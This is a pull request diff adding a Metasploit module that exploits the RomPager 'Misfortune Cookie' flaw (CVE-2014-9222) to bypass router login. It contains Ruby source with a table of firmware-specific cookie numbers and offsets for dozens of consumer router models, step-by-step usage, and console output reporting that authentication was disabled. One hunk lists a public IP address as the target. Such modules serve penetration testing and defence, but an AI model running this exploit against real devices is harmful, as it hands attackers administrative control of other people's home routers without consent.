### PR TITLE
Add auxiliary RomPager misfortune cookie authentication bypass

### DIFF
--- a/documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
@@ -109,7 +109,7 @@ Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST      90.178.222.214   yes       The target address
+   RHOST      192.168.1.1      yes       The target address
    RPORT      80               yes       The target port
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       URI to test

--- a/documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
@@ -94,109 +94,14 @@ Following is list of devices and firmware versions with known values used for ex
   2. Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass```
   3. Do: ```set rhost <ip>```
   4. Do: ```set rport <port>```
-  5. Do: ```set device <device-id>```
-  6. Do: ```run```
-  7. You should be able to login into the device without authentication
+  5. Do: ```run```
+  6. You should be able to login into the device without authentication
   
 ## Scenarios
 
-  Example run against TP-Link TD-8840T with firmware V2_100525:
+  Example run against TP-Link TD-8817:
 ```
 msf > use auxiliary/admin/http/allegro_rompager_auth_bypass 
-msf auxiliary(allegro_rompager_auth_bypass) > devices
-
-List of vulnerable devices
-==========================
-
-   ID  Name     Model          Firmware                                    Number     Offset
-   --  ----     -----          --------                                    ------     ------
-   0   Azmoon   AZ-D140W       2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1        107367693  13
-   1   Billion  BiPAC 5102S    Av2.7.0.23 (UE0.B1C)                        107369694  13
-   2   Billion  BiPAC 5102S    Bv2.7.0.23 (UE0.B1C)                        107369694  13
-   3   Billion  BiPAC 5200     2.11.84.0(UE2.C2)3.11.11.6                  107369545  9
-   4   Billion  BiPAC 5200     2_11_62_2_ UE0.C2D_3_10_16_0                107371218  21
-   5   Billion  BiPAC 5200A    2_10_5 _0(RE0.C2)3_6_0_0                    107366366  25
-   6   Billion  BiPAC 5200A    2_11_38_0 (RE0.C29)3_10_5_0                 107371453  9
-   7   Billion  BiPAC 5200GR4  2.11.91.0(RE2.C29)3.11.11.52                107367690  21
-   8   Billion  BiPAC 5200SRD  2.10.5.0 (UE0.C2C) 3.6.0.0                  107368270  1
-   9   Billion  BiPAC 5200SRD  2.12.17.0_UE2.C3_3.12.17.0                  107371378  37
-   10  Billion  BiPAC 5200SRD  2_11_62_2(UE0.C3D)3_11_11_22                107371218  13
-   11  D-Link   DSL-2520U      Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL  107368902  25
-   12  D-Link   DSL-2600U      Z1_DSL-2600U                                107366496  13
-   13  D-Link   DSL-2600U      Z2_V1.08_ras                                107360133  20
-   14  TP-Link  TD-8616        V2_080513                                   107371483  21
-   15  TP-Link  TD-8816        V4_100528_Russia                            107369790  17
-   16  TP-Link  TD-8816        V4_100524                                   107369790  17
-   17  TP-Link  TD-8816        V5_100528_Russia                            107369790  17
-   18  TP-Link  TD-8816        V5_100524                                   107369790  17
-   19  TP-Link  TD-8816        V5_100903                                   107369790  17
-   20  TP-Link  TD-8816        V6_100907                                   107371426  17
-   21  TP-Link  TD-8816        V7_111103                                   107371161  1
-   22  TP-Link  TD-8816        V7_130204                                   107370211  5
-   23  TP-Link  TD-8817        V5_100524                                   107369790  17
-   24  TP-Link  TD-8817        V5_100702_TR                                107369790  17
-   25  TP-Link  TD-8817        V5_100903                                   107369790  17
-   26  TP-Link  TD-8817        V6_100907                                   107369788  1
-   27  TP-Link  TD-8817        V6_101221                                   107369788  1
-   28  TP-Link  TD-8817        V7_110826                                   107369522  25
-   29  TP-Link  TD-8817        V7_130217                                   107369316  21
-   30  TP-Link  TD-8817        V7_120509                                   107369321  9
-   31  TP-Link  TD-8817        V8_140311                                   107351277  20
-   32  TP-Link  TD-8820        V3_091223                                   107369768  17
-   33  TP-Link  TD-8840T       V1_080520                                   107369845  5
-   34  TP-Link  TD-8840T       V2_100525                                   107369790  17
-   35  TP-Link  TD-8840T       V2_100702_TR                                107369790  17
-   36  TP-Link  TD-8840T       V2_090609                                   107369570  1
-   37  TP-Link  TD-8840T       V3_101208                                   107369766  17
-   38  TP-Link  TD-8840T       V3_110221                                   107369764  5
-   39  TP-Link  TD-8840T       V3_120531                                   107369688  17
-   40  TP-Link  TD-W8101G      V1_090107                                   107367772  37
-   41  TP-Link  TD-W8101G      V1_090107                                   107367808  21
-   42  TP-Link  TD-W8101G      V2_100819                                   107367751  21
-   43  TP-Link  TD-W8101G      V2_101015_TR                                107367749  13
-   44  TP-Link  TD-W8101G      V2_101101                                   107367749  13
-   45  TP-Link  TD-W8101G      V3_110119                                   107367765  25
-   46  TP-Link  TD-W8101G      V3_120213                                   107367052  25
-   47  TP-Link  TD-W8101G      V3_120604                                   107365835  1
-   48  TP-Link  TD-W8151N      V3_120530                                   107353867  24
-   49  TP-Link  TD-W8901G      V1_080522                                   107367787  21
-   50  TP-Link  TD-W8901G      V1,2_080522                                 107368013  5
-   51  TP-Link  TD-W8901G      V2_090113_Turkish                           107368013  5
-   52  TP-Link  TD-W8901G      V3_140512                                   107367854  9
-   53  TP-Link  TD-W8901G      V3_100603                                   107367751  21
-   54  TP-Link  TD-W8901G      V3_100702_TR                                107367751  21
-   55  TP-Link  TD-W8901G      V3_100901                                   107367749  13
-   56  TP-Link  TD-W8901G      V6_110119                                   107367765  25
-   57  TP-Link  TD-W8901G      V6_110915                                   107367682  21
-   58  TP-Link  TD-W8901G      V6_120418                                   107365835  1
-   59  TP-Link  TD-W8901G      V6_120213                                   107367052  25
-   60  TP-Link  TD-W8901GB     V3_100727                                   107367756  13
-   61  TP-Link  TD-W8901GB     V3_100820                                   107369393  21
-   62  TP-Link  TD-W8901N      V1_111211                                   107353880  0
-   63  TP-Link  TD-W8951ND     V1_101124,100723,100728                     107369839  25
-   64  TP-Link  TD-W8951ND     V1_110907                                   107369876  13
-   65  TP-Link  TD-W8951ND     V1_111125                                   107369876  13
-   66  TP-Link  TD-W8951ND     V3.0_110729_FI                              107366743  21
-   67  TP-Link  TD-W8951ND     V3_110721                                   107366743  21
-   68  TP-Link  TD-W8951ND     V3_20110729_FI                              107366743  21
-   69  TP-Link  TD-W8951ND     V4_120511                                   107364759  25
-   70  TP-Link  TD-W8951ND     V4_120607                                   107364759  13
-   71  TP-Link  TD-W8951ND     V4_120912_FL                                107364760  21
-   72  TP-Link  TD-W8961NB     V1_110107                                   107369844  17
-   73  TP-Link  TD-W8961NB     V1_110519                                   107369844  17
-   74  TP-Link  TD-W8961NB     V2_120319                                   107367629  21
-   75  TP-Link  TD-W8961NB     V2_120823                                   107366421  13
-   76  TP-Link  TD-W8961ND     V1_100722,101122                            107369839  25
-   77  TP-Link  TD-W8961ND     V1_101022_TR                                107369839  25
-   78  TP-Link  TD-W8961ND     V1_111125                                   107369876  13
-   79  TP-Link  TD-W8961ND     V2_120427                                   107364732  25
-   80  TP-Link  TD-W8961ND     V2_120710_UK                                107364771  37
-   81  TP-Link  TD-W8961ND     V2_120723_FI                                107364762  29
-   82  TP-Link  TD-W8961ND     V3_120524,120808                            107353880  0
-   83  TP-Link  TD-W8961ND     V3_120830                                   107353414  36
-   84  ZyXEL    P-660R-T3      3.40(BOQ.0)C0                               107369567  21
-   85  ZyXEL    P-660RU-T3     3.40(BJR.0)C0                               107369567  21
-
 msf auxiliary(allegro_rompager_auth_bypass) > show options
 
 Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
@@ -204,31 +109,20 @@ Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST                       yes       The target address
+   RHOST      90.178.222.214   yes       The target address
    RPORT      80               yes       The target port
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       URI to test
    VHOST                       no        HTTP server virtual host
-   device                      yes       ID of device from list of vulnerable devices
+
 
 msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
 rhost => 192.168.1.1
-msf auxiliary(allegro_rompager_auth_bypass) > set device 33
-device => 33
 msf auxiliary(allegro_rompager_auth_bypass) > run
 
-[*] Device name: TP-Link
-[*] Device model: TD-8840T
-[*] Device firmware: V1_080520
-[-] Exploit failed
-[*] Auxiliary module execution completed
-msf auxiliary(allegro_rompager_auth_bypass) > set device 34
-device => 34
-msf auxiliary(allegro_rompager_auth_bypass) > run
-
-[*] Device name: TP-Link
-[*] Device model: TD-8840T
-[*] Device firmware: V2_100525
-[+] Exploit sent, please check host, authentication should be disabled
+[+] Detected device:TP-Link TD-8817
+[-] Bad response
+[-] Bad response
+[+] Good response, please check host, authentication should be disabled
 [*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
@@ -1,0 +1,234 @@
+## Vulnerable devices
+
+Following is list of devices and firmware versions with known values used for exploitation
+0.   Azmoon   AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
+1.   Billion  BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
+2.   Billion  BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
+3.   Billion  BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6                  
+4.   Billion  BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0                
+5.   Billion  BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0                    
+6.   Billion  BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0                 
+7.   Billion  BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52                
+8.   Billion  BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0                  
+9.   Billion  BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0                  
+10.  Billion  BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22                
+11.  D-Link   DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL  
+12.  D-Link   DSL-2600U - Z1_DSL-2600U                                
+13.  D-Link   DSL-2600U - Z2_V1.08_ras                                
+14.  TP-Link  TD-8616 - V2_080513                                   
+15.  TP-Link  TD-8816 - V4_100528_Russia                            
+16.  TP-Link  TD-8816 - V4_100524                                   
+17.  TP-Link  TD-8816 - V5_100528_Russia                            
+18.  TP-Link  TD-8816 - V5_100524                                   
+19.  TP-Link  TD-8816 - V5_100903                                   
+20.  TP-Link  TD-8816 - V6_100907                                   
+21.  TP-Link  TD-8816 - V7_111103                                   
+22.  TP-Link  TD-8816 - V7_130204                                   
+23.  TP-Link  TD-8817 - V5_100524                                   
+24.  TP-Link  TD-8817 - V5_100702_TR                                
+25.  TP-Link  TD-8817 - V5_100903                                   
+26.  TP-Link  TD-8817 - V6_100907                                   
+27.  TP-Link  TD-8817 - V6_101221                                   
+28.  TP-Link  TD-8817 - V7_110826                                   
+29.  TP-Link  TD-8817 - V7_130217                                   
+30.  TP-Link  TD-8817 - V7_120509                                   
+31.  TP-Link  TD-8817 - V8_140311                                   
+32.  TP-Link  TD-8820 - V3_091223                                   
+33.  TP-Link  TD-8840T - V1_080520                                   
+34.  TP-Link  TD-8840T - V2_100525                                   
+35.  TP-Link  TD-8840T - V2_100702_TR                                
+36.  TP-Link  TD-8840T - V2_090609                                   
+37.  TP-Link  TD-8840T - V3_101208                                   
+38.  TP-Link  TD-8840T - V3_110221                                   
+39.  TP-Link  TD-8840T - V3_120531                                   
+40.  TP-Link  TD-W8101G - V1_090107                                   
+41.  TP-Link  TD-W8101G - V1_090107                                   
+42.  TP-Link  TD-W8101G - V2_100819                                   
+43.  TP-Link  TD-W8101G - V2_101015_TR                                
+44.  TP-Link  TD-W8101G - V2_101101                                   
+45.  TP-Link  TD-W8101G - V3_110119                                   
+46.  TP-Link  TD-W8101G - V3_120213                                   
+47.  TP-Link  TD-W8101G - V3_120604                                   
+48.  TP-Link  TD-W8151N - V3_120530                                   
+49.  TP-Link  TD-W8901G - V1_080522                                   
+50.  TP-Link  TD-W8901G - V1,2_080522                                 
+51.  TP-Link  TD-W8901G - V2_090113_Turkish                           
+52.  TP-Link  TD-W8901G - V3_140512                                   
+53.  TP-Link  TD-W8901G - V3_100603                                   
+54.  TP-Link  TD-W8901G - V3_100702_TR                                
+55.  TP-Link  TD-W8901G - V3_100901                                   
+56.  TP-Link  TD-W8901G - V6_110119                                   
+57.  TP-Link  TD-W8901G - V6_110915                                   
+58.  TP-Link  TD-W8901G - V6_120418                                   
+59.  TP-Link  TD-W8901G - V6_120213                                   
+60.  TP-Link  TD-W8901GB - V3_100727                                   
+61.  TP-Link  TD-W8901GB - V3_100820                                   
+62.  TP-Link  TD-W8901N - V1_111211                                   
+63.  TP-Link  TD-W8951ND - V1_101124,100723,100728                     
+64.  TP-Link  TD-W8951ND - V1_110907                                   
+65.  TP-Link  TD-W8951ND - V1_111125                                   
+66.  TP-Link  TD-W8951ND - V3.0_110729_FI                              
+67.  TP-Link  TD-W8951ND - V3_110721                                   
+68.  TP-Link  TD-W8951ND - V3_20110729_FI                              
+69.  TP-Link  TD-W8951ND - V4_120511                                   
+70.  TP-Link  TD-W8951ND - V4_120607                                   
+71.  TP-Link  TD-W8951ND - V4_120912_FL                                
+72.  TP-Link  TD-W8961NB - V1_110107                                   
+73.  TP-Link  TD-W8961NB - V1_110519                                   
+74.  TP-Link  TD-W8961NB - V2_120319                                   
+75.  TP-Link  TD-W8961NB - V2_120823                                   
+76.  TP-Link  TD-W8961ND - V1_100722,101122                            
+77.  TP-Link  TD-W8961ND - V1_101022_TR                                
+78.  TP-Link  TD-W8961ND - V1_111125                                   
+79.  TP-Link  TD-W8961ND - V2_120427                                   
+80.  TP-Link  TD-W8961ND - V2_120710_UK                                
+81.  TP-Link  TD-W8961ND - V2_120723_FI                                
+82.  TP-Link  TD-W8961ND - V3_120524,120808                            
+83.  TP-Link  TD-W8961ND - V3_120830                                   
+84.  ZyXEL    P-660R-T3 - 3.40(BOQ.0)C0                        
+85.  ZyXEL    P-660RU-T3 - 3.40(BJR.0)C0
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass```
+  3. Do: ```set rhost <ip>```
+  4. Do: ```set rport <port>```
+  5. Do: ```set device <device-id>```
+  6. Do: ```run```
+  7. You should be able to login into the device without authentication
+  
+## Scenarios
+
+  Example run against TP-Link TD-8840T with firmware V2_100525:
+```
+msf > use auxiliary/admin/http/allegro_rompager_auth_bypass 
+msf auxiliary(allegro_rompager_auth_bypass) > devices
+
+List of vulnerable devices
+==========================
+
+   ID  Name     Model          Firmware                                    Number     Offset
+   --  ----     -----          --------                                    ------     ------
+   0   Azmoon   AZ-D140W       2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1        107367693  13
+   1   Billion  BiPAC 5102S    Av2.7.0.23 (UE0.B1C)                        107369694  13
+   2   Billion  BiPAC 5102S    Bv2.7.0.23 (UE0.B1C)                        107369694  13
+   3   Billion  BiPAC 5200     2.11.84.0(UE2.C2)3.11.11.6                  107369545  9
+   4   Billion  BiPAC 5200     2_11_62_2_ UE0.C2D_3_10_16_0                107371218  21
+   5   Billion  BiPAC 5200A    2_10_5 _0(RE0.C2)3_6_0_0                    107366366  25
+   6   Billion  BiPAC 5200A    2_11_38_0 (RE0.C29)3_10_5_0                 107371453  9
+   7   Billion  BiPAC 5200GR4  2.11.91.0(RE2.C29)3.11.11.52                107367690  21
+   8   Billion  BiPAC 5200SRD  2.10.5.0 (UE0.C2C) 3.6.0.0                  107368270  1
+   9   Billion  BiPAC 5200SRD  2.12.17.0_UE2.C3_3.12.17.0                  107371378  37
+   10  Billion  BiPAC 5200SRD  2_11_62_2(UE0.C3D)3_11_11_22                107371218  13
+   11  D-Link   DSL-2520U      Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL  107368902  25
+   12  D-Link   DSL-2600U      Z1_DSL-2600U                                107366496  13
+   13  D-Link   DSL-2600U      Z2_V1.08_ras                                107360133  20
+   14  TP-Link  TD-8616        V2_080513                                   107371483  21
+   15  TP-Link  TD-8816        V4_100528_Russia                            107369790  17
+   16  TP-Link  TD-8816        V4_100524                                   107369790  17
+   17  TP-Link  TD-8816        V5_100528_Russia                            107369790  17
+   18  TP-Link  TD-8816        V5_100524                                   107369790  17
+   19  TP-Link  TD-8816        V5_100903                                   107369790  17
+   20  TP-Link  TD-8816        V6_100907                                   107371426  17
+   21  TP-Link  TD-8816        V7_111103                                   107371161  1
+   22  TP-Link  TD-8816        V7_130204                                   107370211  5
+   23  TP-Link  TD-8817        V5_100524                                   107369790  17
+   24  TP-Link  TD-8817        V5_100702_TR                                107369790  17
+   25  TP-Link  TD-8817        V5_100903                                   107369790  17
+   26  TP-Link  TD-8817        V6_100907                                   107369788  1
+   27  TP-Link  TD-8817        V6_101221                                   107369788  1
+   28  TP-Link  TD-8817        V7_110826                                   107369522  25
+   29  TP-Link  TD-8817        V7_130217                                   107369316  21
+   30  TP-Link  TD-8817        V7_120509                                   107369321  9
+   31  TP-Link  TD-8817        V8_140311                                   107351277  20
+   32  TP-Link  TD-8820        V3_091223                                   107369768  17
+   33  TP-Link  TD-8840T       V1_080520                                   107369845  5
+   34  TP-Link  TD-8840T       V2_100525                                   107369790  17
+   35  TP-Link  TD-8840T       V2_100702_TR                                107369790  17
+   36  TP-Link  TD-8840T       V2_090609                                   107369570  1
+   37  TP-Link  TD-8840T       V3_101208                                   107369766  17
+   38  TP-Link  TD-8840T       V3_110221                                   107369764  5
+   39  TP-Link  TD-8840T       V3_120531                                   107369688  17
+   40  TP-Link  TD-W8101G      V1_090107                                   107367772  37
+   41  TP-Link  TD-W8101G      V1_090107                                   107367808  21
+   42  TP-Link  TD-W8101G      V2_100819                                   107367751  21
+   43  TP-Link  TD-W8101G      V2_101015_TR                                107367749  13
+   44  TP-Link  TD-W8101G      V2_101101                                   107367749  13
+   45  TP-Link  TD-W8101G      V3_110119                                   107367765  25
+   46  TP-Link  TD-W8101G      V3_120213                                   107367052  25
+   47  TP-Link  TD-W8101G      V3_120604                                   107365835  1
+   48  TP-Link  TD-W8151N      V3_120530                                   107353867  24
+   49  TP-Link  TD-W8901G      V1_080522                                   107367787  21
+   50  TP-Link  TD-W8901G      V1,2_080522                                 107368013  5
+   51  TP-Link  TD-W8901G      V2_090113_Turkish                           107368013  5
+   52  TP-Link  TD-W8901G      V3_140512                                   107367854  9
+   53  TP-Link  TD-W8901G      V3_100603                                   107367751  21
+   54  TP-Link  TD-W8901G      V3_100702_TR                                107367751  21
+   55  TP-Link  TD-W8901G      V3_100901                                   107367749  13
+   56  TP-Link  TD-W8901G      V6_110119                                   107367765  25
+   57  TP-Link  TD-W8901G      V6_110915                                   107367682  21
+   58  TP-Link  TD-W8901G      V6_120418                                   107365835  1
+   59  TP-Link  TD-W8901G      V6_120213                                   107367052  25
+   60  TP-Link  TD-W8901GB     V3_100727                                   107367756  13
+   61  TP-Link  TD-W8901GB     V3_100820                                   107369393  21
+   62  TP-Link  TD-W8901N      V1_111211                                   107353880  0
+   63  TP-Link  TD-W8951ND     V1_101124,100723,100728                     107369839  25
+   64  TP-Link  TD-W8951ND     V1_110907                                   107369876  13
+   65  TP-Link  TD-W8951ND     V1_111125                                   107369876  13
+   66  TP-Link  TD-W8951ND     V3.0_110729_FI                              107366743  21
+   67  TP-Link  TD-W8951ND     V3_110721                                   107366743  21
+   68  TP-Link  TD-W8951ND     V3_20110729_FI                              107366743  21
+   69  TP-Link  TD-W8951ND     V4_120511                                   107364759  25
+   70  TP-Link  TD-W8951ND     V4_120607                                   107364759  13
+   71  TP-Link  TD-W8951ND     V4_120912_FL                                107364760  21
+   72  TP-Link  TD-W8961NB     V1_110107                                   107369844  17
+   73  TP-Link  TD-W8961NB     V1_110519                                   107369844  17
+   74  TP-Link  TD-W8961NB     V2_120319                                   107367629  21
+   75  TP-Link  TD-W8961NB     V2_120823                                   107366421  13
+   76  TP-Link  TD-W8961ND     V1_100722,101122                            107369839  25
+   77  TP-Link  TD-W8961ND     V1_101022_TR                                107369839  25
+   78  TP-Link  TD-W8961ND     V1_111125                                   107369876  13
+   79  TP-Link  TD-W8961ND     V2_120427                                   107364732  25
+   80  TP-Link  TD-W8961ND     V2_120710_UK                                107364771  37
+   81  TP-Link  TD-W8961ND     V2_120723_FI                                107364762  29
+   82  TP-Link  TD-W8961ND     V3_120524,120808                            107353880  0
+   83  TP-Link  TD-W8961ND     V3_120830                                   107353414  36
+   84  ZyXEL    P-660R-T3      3.40(BOQ.0)C0                               107369567  21
+   85  ZyXEL    P-660RU-T3     3.40(BJR.0)C0                               107369567  21
+
+msf auxiliary(allegro_rompager_auth_bypass) > show options
+
+Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST                       yes       The target address
+   RPORT      80               yes       The target port
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       URI to test
+   VHOST                       no        HTTP server virtual host
+   device                      yes       ID of device from list of vulnerable devices
+
+msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf auxiliary(allegro_rompager_auth_bypass) > set device 33
+device => 33
+msf auxiliary(allegro_rompager_auth_bypass) > run
+
+[*] Device name: TP-Link
+[*] Device model: TD-8840T
+[*] Device firmware: V1_080520
+[-] Exploit failed
+[*] Auxiliary module execution completed
+msf auxiliary(allegro_rompager_auth_bypass) > set device 34
+device => 34
+msf auxiliary(allegro_rompager_auth_bypass) > run
+
+[*] Device name: TP-Link
+[*] Device model: TD-8840T
+[*] Device firmware: V2_100525
+[+] Exploit sent, please check host, authentication should be disabled
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
@@ -41,15 +41,6 @@ class MetasploitModule < Msf::Auxiliary
             OptInt.new('device',[true, 'ID of device from list of vulnerable devices'])
         ], Exploit::Remote::HttpClient
     )
-
-    register_advanced_options(
-        [
-            #OptString.new('COOKIE_NUMBER',[false, 'Value used in cookie e.g. 107373883']),
-            #OptInt.new('COOKIE_OFFSET',[false, 'Value of offset in cookie']),
-            OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']),
-            OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$'])
-        ], self.class
-    )
   end
 
   def headers
@@ -58,6 +49,7 @@ class MetasploitModule < Msf::Auxiliary
     }
   end
 
+  # List of known values and models, couldn't find better solution how to store them
   def devices_list
     [
         {:name=> 'Azmoon', :model=>'AZ-D140W', :fw=>'2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1', :number=> 107367693,
@@ -238,6 +230,7 @@ class MetasploitModule < Msf::Auxiliary
     { "devices" => "List known vulnerable devices" }
   end
 
+  # Command for listing all devivces with known values, for bypass to work
   def cmd_devices(*args)
     tbl =	Msf::Ui::Console::Table.new(
         Msf::Ui::Console::Table::Style::Default,
@@ -259,12 +252,6 @@ class MetasploitModule < Msf::Auxiliary
       counter += 1
     end
     print tbl.to_s
-    #print_status("ID\tName")
-
-    #for device in devices_list
-    #  print_status(counter.to_s + ":\t" + device[:name])
-    #  counter += 1
-    #end
   end
 
   def run

--- a/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
@@ -1,0 +1,293 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(
+              info,
+              'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication bypass",
+              'Description' => %q(
+        This module exploits HTTP servers that appear to be vulnerable to the
+        'Misfortune Cookie' vulnerability which affects Allegro Software
+        Rompager versions before 4.34 and can allow attackers to authenticate
+        to the HTTP service as an administrator without providing valid
+        credentials.
+      ),
+              'Author' => [
+                  'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
+                  'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
+                  'Lior Oppenheim' # CVE-2014-9222
+              ],
+              'References' => [
+                  ['CVE', '2014-9222'],
+                  ['URL', 'http://mis.fortunecook.ie'],
+                  ['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
+                  ['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
+              ],
+              'DisclosureDate' => 'Dec 17 2014',
+              'License' => MSF_LICENSE
+          ))
+
+    register_options(
+        [
+            OptString.new('TARGETURI', [true, 'URI to test', '/']),
+            OptInt.new('device',[true, 'ID of device from list of vulnerable devices'])
+        ], Exploit::Remote::HttpClient
+    )
+
+    register_advanced_options(
+        [
+            #OptString.new('COOKIE_NUMBER',[false, 'Value used in cookie e.g. 107373883']),
+            #OptInt.new('COOKIE_OFFSET',[false, 'Value of offset in cookie']),
+            OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']),
+            OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$'])
+        ], self.class
+    )
+  end
+
+  def headers
+    {
+        'Referer' => full_uri
+    }
+  end
+
+  def devices_list
+    [
+        {:name=> 'Azmoon', :model=>'AZ-D140W', :fw=>'2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1', :number=> 107367693,
+         :offset=> 13},  # 0x803D5A79        # tested
+        {:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Av2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
+        # 0x8032204d                       # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Bv2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
+        # 0x8032204d                       # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2.11.84.0(UE2.C2)3.11.11.6', :number=> 107369545,
+         :offset=> 9},  # 0x803ec2ad                  # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2_11_62_2_ UE0.C2D_3_10_16_0', :number=> 107371218,
+         :offset=> 21},  # 0x803c53e5               # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_10_5 _0(RE0.C2)3_6_0_0', :number=> 107366366,
+         :offset=> 25},  # 0x8038a6e1                   # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_11_38_0 (RE0.C29)3_10_5_0', :number=> 107371453,
+         :offset=> 9},  # 0x803b3a51                 # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200GR4', :fw=>'2.11.91.0(RE2.C29)3.11.11.52', :number=> 107367690,
+         :offset=> 21},  # 0x803D8A51               # tested
+        {:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.10.5.0 (UE0.C2C) 3.6.0.0', :number=> 107368270,
+         :offset=> 1},  # 0x8034b109                  # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.12.17.0_UE2.C3_3.12.17.0', :number=> 107371378,
+         :offset=> 37},  # 0x8040587d                 # ----------
+        {:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2_11_62_2(UE0.C3D)3_11_11_22', :number=> 107371218,
+         :offset=> 13},  # 0x803c49d5                # ----------
+        {:name=> 'D-Link', :model=>'DSL-2520U', :fw=>'Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL',
+         :number=> 107368902, :offset=> 25},  # 0x803fea01  # tested
+        {:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z1_DSL-2600U', :number=> 107366496, :offset=> 13},
+        # 0x8040637d                                # ----------
+        {:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z2_V1.08_ras', :number=> 107360133, :offset=> 20},
+        # 0x803389B0                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-8616', :fw=>'V2_080513', :number=> 107371483, :offset=> 21},
+        # 0x80397055                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100528_Russia', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                            # ----------
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100524', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100528_Russia', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                            # ----------
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V6_100907', :number=> 107371426, :offset=> 17},
+        # 0x803c6e09                                   # ----------
